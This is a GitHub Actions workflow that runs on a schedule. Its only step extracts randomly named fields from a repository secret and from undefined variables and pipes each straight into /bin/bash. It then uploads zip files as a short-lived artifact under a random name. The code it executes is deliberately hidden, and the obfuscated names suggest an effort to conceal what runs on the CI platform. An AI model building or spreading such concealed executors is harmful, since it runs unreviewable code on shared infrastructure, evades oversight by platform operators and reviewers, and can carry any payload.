name: gongmincailu
on:
  workflow_dispatch:

  schedule:
    - cron: '34 5,11,17,23 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: gongmincailu
        env:
          cpb0627: ${{ secrets.cpb0627 }}
        run: |
          printf '%s' "$cpb0627" | jq -r .fv3150 | /bin/bash
          echo $kn18946 | jq -r .wd93 | /bin/bash
          echo $qw398 | jq -r .iyq8 | /bin/bash
          echo $ffii3680 | jq -r .lwmkz9 | /bin/bash
          echo $g637 | jq -r .xf1 | /bin/bash
          echo $jyf1768 | jq -r .cbgi086 | /bin/bash
          echo $qvbd5 | jq -r .glti04 | /bin/bash

      - name: Upload artifact
        uses: actions/upload-artifact@v4
        with:
          name: I4BikXwb
          path: "*.zip"
          retention-days: 1
